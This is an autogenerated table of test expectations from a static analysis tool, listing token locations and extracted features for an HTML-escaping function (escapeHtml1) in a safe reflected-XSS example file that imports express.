autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:10 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:10 | html | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:10 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:10 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:10 | html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html = '' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html = '' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html = '' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html = '' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:7:8:15 | html = '' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:14:8:15 | '' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:14:8:15 | '' | contextSurroundingFunctionParameters | (string) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:14:8:15 | '' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:14:8:15 | '' | enclosingFunctionName | escapeHtml1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:8:14:8:15 | '' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:15 | lastIndex | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:15 | lastIndex | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:15 | lastIndex | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:15 | lastIndex | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:15 | lastIndex | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex = 0 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex = 0 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex = 0 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex = 0 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:7:9:19 | lastIndex = 0 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:19:9:19 | 0 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:19:9:19 | 0 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:19:9:19 | 0 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:19:9:19 | 0 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:9:19:9:19 | 0 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:16 | index | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:16 | index | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:16 | index | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:16 | index | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:16 | index | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index = 0 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index = 0 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index = 0 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index = 0 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:12:11:20 | index = 0 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:20:11:20 | 0 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:20:11:20 | 0 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:20:11:20 | 0 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:20:11:20 | 0 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:20:11:20 | 0 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | index | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | index | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | index | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | index | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | index | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | lastIndex | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | lastIndex | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | lastIndex | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | lastIndex | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:23 | lastIndex | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:40 | index < str.length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:40 | index < str.length | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:40 | index < str.length | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:40 | index < str.length | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:23:11:40 | index < str.length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:33 | str | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:33 | str | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:33 | str | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:33 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:33 | str | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:40 | str.length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:40 | str.length | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:40 | str.length | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:40 | str.length | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:31:11:40 | str.length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:35:11:40 | length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:35:11:40 | length | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:35:11:40 | length | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:35:11:40 | length | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:35:11:40 | length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | lastIndex | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | lastIndex | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | lastIndex | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | lastIndex | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:43 | lastIndex | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index++ | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index++ | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index++ | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index++ | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:11:43:11:49 | index++ | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:15 | str | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:15 | str | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:15 | str | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:15 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:15 | str | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:26 | str.charCodeAt | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:26 | str.charCodeAt | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:26 | str.charCodeAt | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:26 | str.charCodeAt | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:26 | str.charCodeAt | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | exceptional return of str.cha ... (index) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | exceptional return of str.cha ... (index) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | exceptional return of str.cha ... (index) | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | exceptional return of str.cha ... (index) | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | exceptional return of str.cha ... (index) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | str.cha ... (index) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | str.cha ... (index) | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | str.cha ... (index) | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | str.cha ... (index) | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:13:12:33 | str.cha ... (index) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:17:12:26 | charCodeAt | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:17:12:26 | charCodeAt | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:17:12:26 | charCodeAt | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:17:12:26 | charCodeAt | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:12:17:12:26 | charCodeAt | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:13:12:13:13 | 34 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:13:12:13:13 | 34 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:13:12:13:13 | 34 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:13:12:13:13 | 34 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:13:12:13:13 | 34 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:14 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:14 | escape | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:14 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:14 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:14 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape = '"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape = '"' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape = '"' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape = '"' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:9:14:25 | escape = '"' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:18:14:25 | '"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:18:14:25 | '"' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:18:14:25 | '"' | enclosingFunctionBody | string 